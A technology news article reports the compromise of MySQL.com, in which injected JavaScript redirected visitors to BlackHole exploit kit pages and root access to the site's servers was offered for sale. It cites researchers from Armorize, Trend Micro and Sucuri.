Categories: SecurityWorkspace

MySQL.com Hit By Malware Infection

Unknown attackers compromised the main website of open-source database MySQL and served malware to unsuspecting visitors for a short period of time on 26 September.

Attackers injected JavaScript code on MySQL.com, owned by Oracle, to divert visitors to malicious websites hosting the BlackHole exploit kit, which automatically downloaded malware to the victimised computers, according to Wayne Huange, founder, president and chief executive of Armorize Technologies. The company said the attack has been disabled and the site is no longer serving up malware.

Malicious JavaScript

The main page of MySQL.com was compromised to force visitors to load a JavaScript file, Huang wrote on the Armorize blog. The file created an IFRAME that redirected the victim unknowingly to a page hosted at falosfax.in, hosted in Florida and again to a .cx.cc domain hosted in Sweden.

Once on the page, the BlackHole kit hosted on the site exploited the user’s web browser and installed plug-ins to download malware. Attackers modified a JavaScript file used by the Omniture SiteCatalyst plug-in, used to track website metrics, for this attack.

“The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection,” Huang wrote.

BlackHole is a widely used kit that contains pre-loaded exploits for vulnerabilities in web browsers and in other web components and plug-ins, such as Flash Player, Adobe Reader and Java. It takes advantage of unpatched software to compromise the machine. The drive-by-download attack is a common technique and often relies on JavaScript to silently redirect users to malicious sites without their knowing.

Eight out of 44 major security vendors currently detect the malware, according to malware tracker VirusTotal.

Root access sold

Trend Micro researchers found evidence that attackers were selling root access to some of the cluster servers of mysql.com and its subdomains on underground criminal forums. The seller was offering a shell console window with root access to these servers for $3,000 (£1,900), Maxim Goncharov, a senior threat researcher at Trend Micro wrote on the Malware blog.

Cyber-criminals are “brazen” enough to sell administrative access to specific systems, Goncharov wrote.

It appears that the site was initially compromised by a JavaScript malware which is often related to stolen FTP passwords, according to researchers at Sucuri Security. The malware likely compromised a computer belonging to a member of the MySQL.com team and stole the password from the FTP client, Sucuri researchers wrote on the blog.

MySQL is an open-source database that originally was owned by an independent entity, but was purchased by Sun Microsystems in 2008. It later became part of Oracle when that company bought Sun in 2009. Trend Micro’s Goncharov said the team contacted MySQL last week but hadn’t received a response. The site appeared to be serving up malware for about a three-hour window in the middle of the day.

With root access available for sale, it is possible that the malicious perpetrator who originally compromised mysql.com is not the one responsible for the BlackHole attack that served up malware on the site.

Fahmida Y Rashid eWEEK USA 2014. Ziff Davis Enterprise Inc. All Rights Reserved.

Share
Published by
Fahmida Y Rashid eWEEK USA 2014. Ziff Davis Enterprise Inc. All Rights Reserved.

Recent Posts

Mark Zuckerberg Overtakes Bezos To Become Second-Richest Man

Billionaire battle. Meta's boss Mark Zuckerberg overtakes Jeff Bezos to become the world’s second richest…

21 hours ago

US, Microsoft Disrupts Russian FSB Hackers

Internet domains used by “Russian intelligence agents and their proxies” for cyberattacks, seized by the…

23 hours ago

Mike Lynch Died From Drowning, Coroner Inquest Rules

UK's tech billionaire Dr Mike Lynch died from drowning on his superyacht, but his daughter's…

1 day ago

Tesla Recalls 27,000 Cybertrucks Over Rear Camera Issue

Another recall for thousands of Tesla Cybertrucks over delay with rear camera, with could hamper…

2 days ago

Browser Firms Press EU To Reconsider Microsoft Edge As Gatekeeper

Browser firms write to European Commission alleging Microsoft's Edge web browser enjoys an unfair advantage

2 days ago

Microsoft Invests €4.3 Billion In Italy For AI, Cloud

Data centre and AI spending spree continues over at Microsoft, with Italy earmarked for €4.3…

2 days ago